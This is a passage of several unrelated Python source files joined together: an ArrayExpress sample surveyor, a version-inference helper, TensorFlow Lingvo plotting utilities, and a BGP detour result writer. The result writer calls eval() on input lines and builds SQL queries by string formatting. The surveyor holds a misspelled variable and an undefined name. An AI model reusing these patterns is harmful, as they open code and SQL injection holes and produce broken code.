Note that the ArrayExpress experiment-level protocol may include
multiple protocol entries.
"""
if not 'protocol' in experiment_protocol:
return (existing_protocols, False)
is_updated = False
# Compare each entry in experiment protocol with the existing
# protocols; if the entry is new, add it to exising_protocols.
for new_protocol in experiment_protocol['protocol']:
new_protocol_text = new_protocol.get('text', '')
new_protocol_text = ArrayExpressSurveyor.extract_protocol_text(new_protocol_text)
# Ignore experiment-level protocols whose accession or text
# field is unavailable or empty.
if (not new_protocol.get('accession', '').strip() or
not new_protocol_text):
continue
new_protocol_is_found = False
for existing_protocol in existing_protocols:
if (new_protocol.get('accession', '') == existing_protocol['Accession']
and new_protocol_text == existing_protocol['Text']
and new_protocol.get('type', '') == existing_protocol['Type']):
new_protocol_is_found = True
break
if not new_protocol_is_found:
existing_protocols.append({
'Accession': new_protocol['accession'],
'Text': new_protocol_text,
'Type': new_protocol.get('type', ''), # in case 'type' field is unavailable
'Reference': protocol_url
})
is_updated = True
return (existing_protocols, is_updated)
def create_samples_from_api(self,
experiment: Experiment,
platform_dict: Dict
) -> List[Sample]:
"""Generates a Sample item for each sample in an AE experiment.
There are many possible data situations for a sample:
- If the sample only has raw data available:
- If it is on a platform that we support:
Download this raw data and process it
- If it is not on a platform we support:
Don't download anything, don't process anything
- If the sample has both raw and derived data:
- If the raw data is on a platform we support:
Download the raw data and process it, abandon the derived data
- If the raw data is not on a platform we support
Download the derived data and no-op it, abandon the raw data
- If the sample only has derived data:
Download the derived data and no-op it.
See an example at: https://www.ebi.ac.uk/arrayexpress/json/v3/experiments/E-MTAB-3050/samples
"""
created_samples = []
samples_endpoint = SAMPLES_URL.format(experiment.accession_code)
r = utils.requests_retry_session().get(samples_endpoint, timeout=60)
samples = r.json()["experiment"]["sample"]
# The SDRF is the complete metadata record on a sample/property basis.
# We run this through our harmonizer and then attach the properties
# to our created samples.
SDRF_URL_TEMPLATE = "https://www.ebi.ac.uk/arrayexpress/files/{code}/{code}.sdrf.txt"
sdrf_url = SDRF_URL_TEMPLATE.format(code=experiment.accession_code)
sdrf_samples = harmony.parse_sdrf(sdrf_url)
harmonized_samples = harmony.harmonize(sdrf_samples)
# An experiment can have many samples
for sample_data in samples:
# For some reason, this sample has no files associated with it.
if "file" not in sample_data or len(sample_data['file']) == 0:
continue
# Each sample is given an experimenatlly-unique title.
flat_sample = utils.flatten(sample_data)
title = harmony.extract_title(flat_sample)
# A sample may actually have many sub files.
# If there is raw data, take that.
# If not, take the derived.
has_raw = False
for sub_file in sample_data['file']:
# For ex: E-GEOD-15645
if isinstance(sub_file['comment'], list):
sub_file_mod = sub_file
sub_file_mod['comment'] = sub_file['comment'][0]
else:
sub_file_mod = sub_file
# Some have the 'data' field, but not the actual data
# Ex: E-GEOD-9656
if sub_file_mod['type'] == "data" and sub_file_mod['comment'].get('value', None) != None:
has_raw = True
if 'raw' in sub_file_mod['comment'].get('value', ''):
has_raw = True
skip_sample = False
for sub_file in sample_data['file']:
# Don't get the raw data if it's only a 1-color sample.
if 'Cy3' in str(sample_data) and 'Cy5' not in str(sample_data):
has_raw = False
# Skip derived data if we have it raw.
if has_raw and "derived data" in sub_file['type']:
continue
download_url = None
filename = sub_file["name"]
# sub_file["comment"] is only a list if there's
# more than one comment...
comments = sub_file["comment"]
if isinstance(comments, list):
# Could be: "Derived ArrayExpress Data Matrix FTP
# file" or: "ArrayExpress FTP file". If there is
# no comment with a name including "FTP file" then
# we don't know where to download it so we need to
# mark this job as an error. Therefore don't catch
# the potential exception where download_url
# doesn't get defined.
for comment in comments:
if "FTP file" in comment["name"]:
download_url = comment["value"]
break
else:
download_url = comments["value"]
if not download_url:
logger.error("Sample %s did not specify a download url, skipping.",
sample_accession_code,
experiment_accession_code=experiment.accession_code,
survey_job=self.survey_job.id,
sub_file=sub_file)
skip_sample = True
continue
if not filename:
logger.error("Sample %s did not specify a filename, skipping.",
sample_accession_code,
experiment_accession_code=experiment.accession_code,
survey_job=self.survey_job.id,
sub_file=sub_file)
skip_sample = True
continue
if skip_sample:
continue
# The accession code is not a simple matter to determine.
sample_source_name = sample_data["source"].get("name", "")
sample_assay_name = sample_data["assay"].get("name", "")
sample_accession_code = self.determine_sample_accession(
experiment.accession_code,
sample_source_name,
sample_assay_name,
filename)
# Figure out the Organism for this sample
organism_name = UNKNOWN
for characteristic in sample_data["characteristic"]:
if characteristic["category"].upper() == "ORGANISM":
organism_name = characteristic["value"].upper()
if organism_name == UNKNOWN:
logger.error("Sample %s did not specify the organism name.",
sample_accession_code,
experiment_accession_code=experiment.accession_code,
survey_job=self.survey_job.id)
organism = None
continue
else:
organism = Organism.get_object_for_name(organism_name)
# Create the sample object
try:
# Associate it with the experiment, but since it
# already exists it already has original files
# associated with it and it's already been downloaded,
# so don't add it to created_samples.
sample_object = Sample.objects.get(accession_code=sample_accession_code)
# If input experiment includes new protocol information,
# update sample's protocol_info.
existing_protocols = sample_object.protocol_info
protocol_info, is_updated = self.update_sample_protocol_info(
existing_protocols,
experiment.protocol_description,
experiment.source_url + '/protocols'
)
if is_updated:
sample_object.protocol_info = protocol_info
sample_obejct.save()
logger.debug("Sample %s already exists, skipping object creation.",
sample_accession_code,
experiment_accession_code=experiment.accession_code,
survey_job=self.survey_job.id)
except Sample.DoesNotExist:
sample_object = Sample()
# The basics
sample_object.source_database = "ARRAY_EXPRESS"
sample_object.title = title
sample_object.accession_code = sample_accession_code
sample_object.source_archive_url = samples_endpoint
sample_object.organism = organism
sample_object.platform_name = platform_dict["platform_accession_name"]
sample_object.platform_accession_code = platform_dict["platform_accession_code"]
sample_object.manufacturer = platform_dict["manufacturer"]
sample_object.technology = "MICROARRAY"
protocol_info, is_updated = self.update_sample_protocol_info(
existing_protocols=[],
experiment_protocol=experiment.protocol_description,
protocol_url=experiment.source_url + '/protocols'
)
# Do not check is_updated the first time because we must
# save a list so we can append to it later.
sample_object.protocol_info = protocol_info
sample_object.save()
# Directly assign the harmonized properties
harmonized_sample = harmonized_samples[title]
for key, value in harmonized_sample.items():
setattr(sample_object, key, value)
sample_object.save()
sample_annotation = SampleAnnotation()
sample_annotation.data = sample_data
sample_annotation.sample = sample_object
sample_annotation.is_ccdl = False
sample_annotation.save()
original_file = OriginalFile()
original_file.filename = filename
original_file.source_filename = filename
original_file.source_url = download_url
original_file.is_downloaded = False
original_file.is_archive = True
original_file.has_raw = has_raw
original_file.save()
original_file_sample_association = OriginalFileSampleAssociation()
original_file_sample_association.original_file = original_file
original_file_sample_association.sample = sample_object
original_file_sample_association.save()
created_samples.append(sample_object)
logger.debug("Created " + str(sample_object),
experiment_accession_code=experiment.accession_code,
survey_job=self.survey_job.id,
sample=sample_object.id)
# Create associations if they don't already exist
ExperimentSampleAssociation.objects.get_or_create(
experiment=experiment, sample=sample_object)
ExperimentOrganismAssociation.objects.get_or_create(
experiment=experiment, organism=organism)
return created_samples
def discover_experiment_and_samples(self) -> (Experiment, List[Sample]):
experiment_accession_code = (
SurveyJobKeyValue
.objects
.get(survey_job_id=self.survey_job.id,
key__exact="experiment_accession_code")
.value
)
logger.info("Surveying experiment with accession code: %s.",
experiment_accession_code,
survey_job=self.survey_job.id)
try:
experiment, platform_dict = self.create_experiment_from_api(experiment_accession_code)
except UnsupportedPlatformException as e:
logger.info("Experiment was not on a supported platform, skipping.",
experiment_accession_code=experiment_accession_code,
survey_job=self.survey_job.id)
return None, []
except:
logger.exception("Error occurred while surveying experiment!",
experiment_accession_code=experiment_accession_code)
return None, []
samples = self.create_samples_from_api(experiment, platform_dict)
return experiment, samples
|
|
import operator
import itertools
from functools import reduce
import packaging.version
def find(pred, items):
"""
Find the index of the first element in items for which pred returns
True
>>> find(lambda x: x > 3, range(100))
4
>>> find(lambda x: x < -3, range(100)) is None
True
"""
for i, item in enumerate(items):
if pred(item):
return i
def rfind(pred, items):
"""
Find the index of the last element in items for which pred returns
True. Returns a negative number useful for indexing from the end
of a list or tuple.
>>> rfind(lambda x: x > 3, [5,4,3,2,1])
-4
"""
return -find(pred, reversed(items)) - 1
class SummableVersion(packaging.version.Version):
"""
A special version that can be added to another Version.
>>> SummableVersion('1.1') + packaging.version.Version('2.3')
<Version('3.4')>
"""
def __add__(self, other):
result = SummableVersion('1.0')
result._version = result._version._replace(
release=tuple(
itertools.starmap(
operator.add,
itertools.zip_longest(
self._version.release,
other._version.release,
fillvalue=0,
),
),
),
)
return SummableVersion(str(result))
def reset_less_significant(self, significant_version):
"""
Reset to zero all version info less significant than the
indicated version.
>>> ver = SummableVersion('3.1.2')
>>> ver.reset_less_significant(SummableVersion('0.1'))
>>> str(ver)
'3.1'
"""
def nonzero(x):
return x != 0
version_len = len(significant_version._version.release)
significant_pos = rfind(nonzero, significant_version._version.release)
significant_pos = version_len + significant_pos + 1
new_release = self._version.release[:significant_pos] + (0,) * (
version_len - significant_pos
)
self._version = self._version._replace(release=new_release)
self.__init__(str(self))
def as_number(self):
"""
>>> round(SummableVersion('1.9.3').as_number(), 12)
1.93
"""
def combine(subver, ver):
return subver / 10 + ver
return reduce(combine, reversed(self._version.release))
class VersionManagement:
"""
Version functions for RepoManager classes
"""
increment = '0.0.1'
@staticmethod
def __versions_from_tags(tags):
for tag in tags:
try:
yield packaging.version.Version(tag)
except ValueError:
pass
@staticmethod
def __best_version(versions):
try:
return max(versions)
except ValueError:
pass
def get_valid_versions(self):
"""
Return all version tags that can be represented by a Version.
"""
return self.__versions_from_tags(tag.tag for tag in self.get_repo_tags())
def get_tagged_version(self):
"""
Get the version of the local working set as a Version or
None if no viable tag exists. If the local working set is itself
the tagged commit and the tip and there are no local
modifications, use the tag on the parent changeset.
"""
tags = list(self.get_tags())
if 'tip' in tags and not self.is_modified():
tags = self.get_parent_tags('tip')
versions = self.__versions_from_tags(tags)
return self.__best_version(versions)
def get_latest_version(self):
"""
Determine the latest version ever released of the project in
the repo (based on tags).
"""
return self.__best_version(self.get_valid_versions())
def get_current_version(self, increment=None):
"""
Return as a string the version of the current state of the
repository -- a tagged version, if present, or the next version
based on prior tagged releases.
"""
ver = (
self.get_tagged_version() or str(self.get_next_version(increment)) + '.dev0'
)
return str(ver)
def get_next_version(self, increment=None):
"""
Return the next version based on prior tagged releases.
"""
increment = increment or self.increment
return self.infer_next_version(self.get_latest_version(), increment)
@staticmethod
def infer_next_version(last_version, increment):
"""
Given a simple application version (as a Version),
and an increment (1.0, 0.1, or 0.0.1), guess the next version.
Set up a shorthand for examples
>>> def VM_infer(*params):
... return str(VersionManagement.infer_next_version(*params))
>>> VM_infer('3.2', '0.0.1')
'3.2.1'
>>> VM_infer(packaging.version.Version('3.2'), '0.0.1')
'3.2.1'
>>> VM_infer('3.2.3', '0.1')
'3.3'
>>> VM_infer('3.1.2', '1.0')
'4.0'
Subversions never increment parent versions
>>> VM_infer('3.0.9', '0.0.1')
'3.0.10'
If it's a prerelease version, just remove the prerelease.
>>> VM_infer('3.1a1', '0.0.1')
'3.1'
If there is no last version, use the increment itself
>>> VM_infer(None, '0.1')
'0.1'
"""
if last_version is None:
return increment
last_version = SummableVersion(str(last_version))
if last_version.is_prerelease:
last_version._version = last_version._version._replace(
pre=None,
dev=None,
)
return str(last_version)
increment = SummableVersion(increment)
sum = last_version + increment
sum.reset_less_significant(increment)
return sum
|
|
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for generating image summaries using matplotlib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import traceback
import REDACTED.transformer_lingvo.lingvo.compat as tf
from REDACTED.transformer_lingvo.lingvo.core import py_utils
from matplotlib.backends import backend_agg
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
import six
from six.moves import range
from six.moves import zip
def ToUnicode(text):
if not isinstance(text, six.text_type):
text = six.ensure_text(text, 'utf-8')
return text
def AddPlot(unused_fig,
axes,
data,
title=u'',
xlabel=u'',
ylabel=u'',
fontsize='small',
xlim=None,
ylim=None,
suppress_xticks=False,
suppress_yticks=False):
"""Convenience function to add a plot."""
axes.plot(data)
axes.set_title(ToUnicode(title), size=fontsize)
axes.set_xlabel(ToUnicode(xlabel), size=fontsize)
axes.set_ylabel(ToUnicode(ylabel), size=fontsize)
if xlim:
axes.set_xlim(xlim)
if ylim:
axes.set_ylim(ylim)
if suppress_xticks:
axes.set_xticks([])
if suppress_yticks:
axes.set_yticks([])
def AddImage(fig,
axes,
data,
cmap='bone_r',
clim=None,
show_colorbar=True,
title=u'',
xlabel=u'',
ylabel=u'',
fontsize='small',
origin='lower',
suppress_xticks=False,
suppress_yticks=False,
aspect='auto',
vmin=None,
vmax=None):
"""Convenience function to plot data as an image on the given axes."""
image = axes.imshow(
data,
cmap=cmap,
origin=origin,
aspect=aspect,
interpolation='nearest',
vmin=vmin,
vmax=vmax)
if show_colorbar:
fig.colorbar(image)
if clim is not None:
image.set_clim(clim)
axes.set_title(ToUnicode(title), size=fontsize)
axes.set_xlabel(ToUnicode(xlabel), size=fontsize)
axes.set_ylabel(ToUnicode(ylabel), size=fontsize)
if suppress_xticks:
axes.set_xticks([])
if suppress_yticks:
axes.set_yticks([])
def AddScatterPlot(unused_fig,
axes,
xs,
ys,
title=u'',
xlabel=u'',
ylabel=u'',
fontsize='small',
xlim=None,
ylim=None,
suppress_xticks=False,
suppress_yticks=False,
**kwargs):
"""Convenience function to add a scatter plot."""
# For 3D axes, check to see whether zlim is specified and apply it.
if 'zlim' in kwargs:
zlim = kwargs.pop('zlim')
if zlim:
axes.set_zlim(zlim)
axes.scatter(xs, ys, **kwargs)
axes.set_title(ToUnicode(title), size=fontsize)
axes.set_xlabel(ToUnicode(xlabel), size=fontsize)
axes.set_ylabel(ToUnicode(ylabel), size=fontsize)
if xlim:
axes.set_xlim(xlim)
if ylim:
axes.set_ylim(ylim)
if suppress_xticks:
axes.set_xticks([])
if suppress_yticks:
axes.set_yticks([])
_SubplotMetadata = collections.namedtuple('_SubplotMetadata',
['tensor_list', 'plot_func'])
class MatplotlibFigureSummary(object):
"""Helper to minimize boilerplate in creating a summary with several subplots.
Typical usage::
>>> fig_helper = plot.MatplotlibFigureSummary(
... 'summary_name', shared_subplot_kwargs={'xlabel': 'Time'})
>>> fig_helper.AddSubplot([tensor1], title='tensor1')
>>> fig_helper.AddSubplot([tensor2], title='tensor2', ylabel='Frequency')
>>> image_summary = fig_helper.Finalize()
Can also be used as a context manager if the caller does not need the return
value from Finalize(), e.g.
>>> with plot.MatplotlibFigureSummary('figure') as fig:
... fig.AddSubplot([tensor1])
"""
def __init__(self,
name,
figsize=(8, 10),
max_outputs=3,
subplot_grid_shape=None,
gridspec_kwargs=None,
plot_func=AddImage,
shared_subplot_kwargs=None):
"""Creates a new MatplotlibFigureSummary object.
Args:
name: A string name for the generated summary.
figsize: A 2D tuple containing the overall figure (width, height)
dimensions in inches.
max_outputs: The maximum number of images to generate.
subplot_grid_shape: A 2D tuple containing the height and width dimensions
of the subplot grid. height * width must be >= the number of subplots.
Defaults to (num_subplots, 1), i.e. a vertical stack of plots.
gridspec_kwargs: A dict of extra keyword args to use when initializing the
figure's gridspec, as supported by matplotlib.gridspec.GridSpec.
plot_func: A function shared across all subplots used to populate a single
subplot. See the docstring for AddSubplot for details.
shared_subplot_kwargs: A dict of extra keyword args to pass to the plot
function for all subplots. This is useful for specifying properties
such as 'clim' which should be consistent across all subplots.
"""
self._name = name
self._figsize = figsize
self._max_outputs = max_outputs
self._subplot_grid_shape = subplot_grid_shape
self._gridspec_kwargs = gridspec_kwargs if gridspec_kwargs else {}
self._plot_func = plot_func
self._shared_subplot_kwargs = (
shared_subplot_kwargs if shared_subplot_kwargs else {})
self._subplots = []
def __enter__(self):
return self
def __exit__(self, unused_exc_type, unused_exc_value, unused_tb):
self.Finalize()
def AddSubplot(self, tensor_list, plot_func=None, **kwargs):
r"""Adds a subplot from tensors using plot_fun to populate the subplot axes.
Args:
tensor_list: A list of tensors to be realized as numpy arrays and passed
as arguments to plot_func. The first dimension of each tensor in the
list corresponds to batch, and must be the same size for each tensor.
plot_func: A function with signature f(fig, axes, data1, data2, ...,
datan, \*\*kwargs) that will be called with the realized data from
tensor_list to plot data on axes in fig. This function is called
independently on each element of the batch. Overrides plot_func passed
in to the constructor.
**kwargs: A dict of additional non-tensor keyword args to pass to
plot_func when generating the plot, overridding any
shared_subplot_kwargs. Useful for e.g. specifying a subplot's title.
"""
merged_kwargs = dict(self._shared_subplot_kwargs, **kwargs)
if plot_func is None:
plot_func = self._plot_func
plot_func = functools.partial(plot_func, **merged_kwargs)
self._subplots.append(_SubplotMetadata(tensor_list, plot_func))
def Finalize(self):
"""Finishes creation of the overall figure, returning the image summary."""
subplot_grid_shape = self._subplot_grid_shape
if subplot_grid_shape is None:
subplot_grid_shape = (len(self._subplots), 1)
# AddMatplotlibFigureSummary (due to restrictions of py_func) only supports
# flattened list of tensors so we must do some bookkeeping to maintain a
# mapping from _SubplotMetadata object to flattened_tensors.
subplot_slices = []
flattened_tensors = []
for subplot in self._subplots:
start = len(flattened_tensors)
subplot_slices.append((start, start + len(subplot.tensor_list)))
flattened_tensors.extend(subplot.tensor_list)
def PlotFunc(fig, *numpy_data_list):
gs = gridspec.GridSpec(*subplot_grid_shape, **self._gridspec_kwargs)
for n, subplot in enumerate(self._subplots):
axes = fig.add_subplot(gs[n])
start, end = subplot_slices[n]
subplot_data = numpy_data_list[start:end]
subplot.plot_func(fig, axes, *subplot_data)
func = functools.partial(_RenderMatplotlibFigures, self._figsize,
self._max_outputs, PlotFunc)
batch_sizes = [tf.shape(t)[0] for t in flattened_tensors]
num_tensors = len(flattened_tensors)
with tf.control_dependencies([
tf.assert_equal(
batch_sizes, [batch_sizes[0]] * num_tensors, summarize=num_tensors)
]):
rendered = tf.py_func(
func, flattened_tensors, tf.uint8, name='RenderMatplotlibFigures')
return tf.summary.image(self._name, rendered, max_outputs=self._max_outputs)
def _RenderOneMatplotlibFigure(fig, plot_func, *numpy_data_list):
fig.clear()
plot_func(fig, *numpy_data_list)
fig.canvas.draw()
ncols, nrows = fig.canvas.get_width_height()
image = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
return image.reshape(nrows, ncols, 3)
def _RenderMatplotlibFigures(figsize, max_outputs, plot_func, *numpy_data_list):
r"""Renders a figure containing several subplots using matplotlib.
This is an internal implementation detail of MatplotlibFigureSummary.Finalize
and should not be called directly.
The unconventional function signature is used to work around the behavior of
`tf.py_func` which always passes in different tensors as positional arguments.
Args:
figsize: A 2D tuple containing the overall figure (width, height) dimensions
in inches.
max_outputs: The maximum number of images to generate.
plot_func: A function with signature f(fig, data1, data2, ..., datan) that
will be called with \*numpy_data_list to plot data in fig.
*numpy_data_list: A list of numpy matrices to plot specified as separate
arguments.
Returns:
A numpy 4D array of type np.uint8 which can be used to generate a
`tf.math.image_summary` when converted to a tf tensor.
"""
batch_size = numpy_data_list[0].shape[0]
max_outputs = min(max_outputs, batch_size)
images = []
# Use plt.Figure instead of plt.figure to avoid a memory leak (matplotlib
# keeps global references to every figure created with plt.figure). When not
# using plt.figure we have to create a canvas manually.
fig = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
backend_agg.FigureCanvasAgg(fig)
for b in range(max_outputs):
data = [numpy_data[b] for numpy_data in numpy_data_list]
try:
images.append(_RenderOneMatplotlibFigure(fig, plot_func, *data))
except Exception as e: # pylint: disable=broad-except
tf.logging.warning('Error rendering example %d using matplotlib: %s\n%s',
b, e, traceback.format_exc())
if len(images) == max_outputs:
break
plt.close(fig)
# Pad with dummy black images in case there were too many rendering errors.
while len(images) < max_outputs:
image_shape = (1, 1, 1)
if images:
image_shape = images[0].shape
images.append(np.ones(image_shape, dtype=np.uint8))
return np.array(images)
def FigureToSummary(name, fig):
"""Create tf.Summary proto from matplotlib.figure.Figure.
Args:
name: Summary name.
fig: A matplotlib figure object.
Returns:
A `tf.Summary` proto containing the figure rendered to an image.
"""
canvas = backend_agg.FigureCanvasAgg(fig)
fig.canvas.draw()
ncols, nrows = fig.canvas.get_width_height()
png_file = six.BytesIO()
canvas.print_figure(png_file)
png_str = png_file.getvalue()
return tf.Summary(value=[
tf.Summary.Value(
tag='%s/image' % name,
image=tf.Summary.Image(
height=nrows,
width=ncols,
colorspace=3,
encoded_image_string=png_str))
])
def Image(name, figsize, image, setter=None, **kwargs):
"""Plot an image in numpy and generates tf.Summary proto for it.
Args:
name: Image summary name.
figsize: A 2D tuple containing the overall figure (width, height) dimensions
in inches.
image: A 2D/3D numpy array in the format accepted by pyplot.imshow.
setter: A callable taking (fig, axes). Useful to fine-tune layout of the
figure, xlabel, xticks, etc.
**kwargs: Additional arguments to AddImage.
Returns:
A `tf.Summary` proto contains one image visualizing 'image.
"""
assert image.ndim in (2, 3), '%s' % image.shape
fig = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
axes = fig.add_subplot(1, 1, 1)
# Default show_colorbar to False if not explicitly specified.
show_colorbar = kwargs.pop('show_colorbar', False)
# Default origin to 'upper' if not explicitly specified.
origin = kwargs.pop('origin', 'upper')
AddImage(
fig, axes, image, origin=origin, show_colorbar=show_colorbar, **kwargs)
if setter:
setter(fig, axes)
return FigureToSummary(name, fig)
def Scatter(name, figsize, xs, ys, setter=None, **kwargs):
"""Plot a scatter plot in numpy and generates tf.Summary proto for it.
Args:
name: Scatter plot summary name.
figsize: A 2D tuple containing the overall figure (width, height) dimensions
in inches.
xs: A set of x points to plot.
ys: A set of y points to plot.
setter: A callable taking (fig, axes). Useful to fine-tune layout of the
figure, xlabel, xticks, etc.
**kwargs: Additional arguments to AddScatterPlot.
Returns:
A `tf.Summary` proto contains one image visualizing 'image.
"""
fig = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
# If z data is provided, use 3d projection.
#
# This requires the mplot3d toolkit (e.g., from mpl_toolkits import mplot3d)
# to be registered in the program.
if 'zs' in kwargs:
axes = fig.add_subplot(111, projection='3d')
else:
axes = fig.add_subplot(1, 1, 1)
AddScatterPlot(fig, axes, xs, ys, **kwargs)
if setter:
setter(fig, axes)
return FigureToSummary(name, fig)
Matrix = Image # pylint: disable=invalid-name
def Curve(name, figsize, xs, ys, setter=None, **kwargs):
"""Plot curve(s) to a `tf.Summary` proto.
Args:
name: Image summary name.
figsize: A 2D tuple containing the overall figure (width, height) dimensions
in inches.
xs: x values for matplotlib.pyplot.plot.
ys: y values for matplotlib.pyplot.plot.
setter: A callable taking (fig, axes). Useful to fine-control layout of the
figure, xlabel, xticks, etc.
**kwargs: Extra args for matplotlib.pyplot.plot.
Returns:
A `tf.Summary` proto contains the line plot.
"""
fig = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
axes = fig.add_subplot(1, 1, 1)
axes.plot(xs, ys, '.-', **kwargs)
if setter:
setter(fig, axes)
return FigureToSummary(name, fig)
def AddMultiCurveSubplot(fig,
tensors,
paddings,
labels,
xlabels=None,
**kwargs):
"""Adds a multi curve subplot to Matplotlib figure.
Plots one line for each entry in tensors and assigns a plot label legend.
Args:
fig: The Matplotlib figure.
tensors: List of tensors of shape [batch, length]
paddings: Paddings for 'tensors' with shape [batch, length] with 0. in valid
positions and 1. in invalid.
labels: A list of tensor names (strings) of the same length as 'tensors'.
xlabels: A string tensor of shape [batch] with an xlabel per batch.
**kwargs: With optional, title, xlabel, ylabel, fontsize.
"""
data = []
row_labels = []
for t, l in zip(tensors, labels):
if t is not None:
data.append(py_utils.ApplyPadding(paddings, t))
row_labels.append(l)
shape = py_utils.GetShape(data[0], 2)
data = tf.reshape(tf.concat(data, -1), [shape[0], len(data), shape[1]])
args = [data, py_utils.LengthsFromPaddings(paddings)]
if xlabels is not None:
args.append(xlabels)
fig.AddSubplot(
args, plot_func=_AddMultiCurveRowPlots, row_labels=row_labels, **kwargs)
def _AddMultiCurveRowPlots(fig,
axes,
data,
length,
x_label_override=None,
row_labels=None,
title=u'',
xlabel=u'',
ylabel=u'',
fontsize='small'):
"""Add a plot per row in data and cut the plot by the length."""
del fig
colors = ['b-', 'r-', 'g-', 'm-', 'y-']
for row in range(data.shape[0]):
label = row_labels[row] if row_labels else '{}'.format(row)
axes.plot(data[row, :length], colors[row % len(colors)], label=label)
axes.set_xlim([0, length])
axes.legend()
axes.set_title(ToUnicode(title), size=fontsize)
if x_label_override:
axes.set_xlabel(ToUnicode(x_label_override), size='x-small', wrap=True)
else:
axes.set_xlabel(ToUnicode(xlabel), size=fontsize)
axes.set_ylabel(ToUnicode(ylabel), size=fontsize)
|
|
import threading
from contextlib import closing
import os.path
import os
import subprocess
import traceback
from customUtilities.helperFunctions import *
from customUtilities.logger import logger
class ResultWriter():
def __init__(self,resultfilename,logger=logger('detourResultWriter.log')):
self.lock = threading.RLock()
self.resultfilename = resultfilename
#There could be some old garbage result file with same name, remove it
if os.path.exists(self.resultfilename):
os.remove(self.resultfilename)
self.logger=logger
self.peers = []
self.rib_name=None
self.rib_time='NULL'
self.num_entries=0
self.num_def_detours=0
self.num_poss_detours=0
self.ProcessedRibData=[] #List to hold summarized information about result file
self.ProcessedPeerData=[] #List to hold summarized information per peer
self.ProcessedPeerInfo=[] #List to hold peer location info
def resetparams(self):
if os.path.exists(self.resultfilename):
os.remove(self.resultfilename)
self.peers = []
self.rib_name=None
self.rib_time='NULL'
self.num_entries=0
self.num_def_detours=0
self.num_poss_detours=0
def write(self,val):
self.lock.acquire()
try:
#Log file
resultfile = open(self.resultfilename,'a')
valList=eval(val)
strg=''
for field in valList:
#logger.warn(str(field))
strg=strg+str(field)+'|'
print(strg[:-1],file=resultfile)
resultfile.close()
finally:
self.lock.release()
def populateProcessedPeerData(self,processedRibsID):
self.ProcessedPeerData=[]
for iter in range(0,len(self.peers)):
flist=[]
#flist.append('None') # For ID
flist.append(processedRibsID)
flist.append(self.peers[iter].peerIP)
flist.append(self.peers[iter].peer_num_entries)
flist.append(self.peers[iter].peer_num_poss_detours)
flist.append(self.peers[iter].peer_num_def_detours)
self.ProcessedPeerData.append(flist)
def populateProcessedRibData(self,status):
self.ProcessedRibData=[]
flist=[]
flist.append('None') # For ID
flist.append(self.rib_name)
flist.append(self.rib_time)
curr_epoch,_=currentTime()
flist.append(curr_epoch)
flist.append(status)
flist.append(self.num_entries)
flist.append(self.num_poss_detours)
flist.append(self.num_def_detours)
self.ProcessedRibData.append(flist)
def populateProcessedPeerInfo(self):
self.ProcessedPeerInfo=[]
for iter in range(0,len(self.peers)):
flist=[]
flist.append('None') # For ID
flist.append(self.peers[iter].peerAS)
flist.append(self.peers[iter].peerIP)
flist.append(self.peers[iter].peerCountry)
self.ProcessedPeerInfo.append(flist)
def get_ASPath(self,db,as_path):
with closing( db.cursor() ) as cur:
try:
cur.execute("select as_path from UniqueAbnormalPaths where as_path = '{0}'".format(as_path))
retval=cur.fetchone()
except:
logger.error("Invalid Path: "+as_path)
raise Exception('Select ASPath to UniqueAbnormalPaths Failed')
return retval
def push_UniqueAbnormalPaths(self,db,data):
with closing( db.cursor() ) as cur:
try:
#TODO: Check if this path has been pushed previously
cur.executemany("insert into UniqueAbnormalPaths(id,as_path,countries,analysis,detour_origin_asn,detour_origin_countries,detour_return_asn,detour_return_countries,detour_length,detour_destination_asn,detour_destination_countries,detour_countries_affected) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to UniqueAbnormalPaths Failed')
def push_AbnormalRibEntries(self,db,data):
with closing( db.cursor() ) as cur:
try:
cur.executemany("insert into AbnormalRibEntries(id,rib_time,peer,prefix,as_path) values (%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to AbnormalRibEntries Failed')
def push_ProcessedRibs(self,db,data):
with closing( db.cursor() ) as cur:
try:
cur.execute("insert into ProcessedRibs(id,rib_name,rib_time,insert_time,read_status,num_entries,num_poss_detours,num_def_detours) values (%s,%s,%s,%s,%s,%s,%s,%s)",data[0])
db.commit()
cur.execute("select id from ProcessedRibs where rib_name= '{0}'".format(data[0][1]))
processedRibsID=cur.fetchone()
return processedRibsID[0]
except:
raise Exception('Multi-Insert to push_ProcessedRibs Failed')
def push_ProcessedPeers(self,db,data):
with closing( db.cursor() ) as cur:
try:
cur.executemany("insert into ProcessedPeers(processedRibsID,peerIP,peer_num_entries,peer_num_poss_detours,peer_num_def_detours) values (%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to ProcessedPeers Failed')
def push_PeerInfo(self,db,data):
with closing( db.cursor() ) as cur:
try:
for datarow in data:
cur.execute("select id from PeerInfo where peerIP = '{0}'".format(datarow[2]))
retval=cur.fetchone()
if not retval:
cur.execute("insert into PeerInfo(id,peerAS,peerIP,peerIP_Country) values (%s,%s,%s,%s)",datarow)
db.commit()
except:
raise Exception('Multi-Insert to push_PeerInfo Failed')
def loadtoDB(self,db):
self.lock.acquire()
toPushUniqueAbnormalPaths=[]
toPushAbnormalRibEntries=[]
try:
#if not os.path.exists(self.resultfilename):
# logger.warn('No result file for: '+str(self.resultfilename))
# self.resetparams()
# return
self.logger.info("Pushing "+self.resultfilename+" to DB.")
seenASPaths=[]
if os.path.exists(self.resultfilename):
f=open(self.resultfilename, 'r')
for line in f:
if line == "":
continue
rl = line.strip()
#TODO: rline should be a dict
rline=rl.split('|')
if rline[6] == 'poss':
self.num_poss_detours+=1
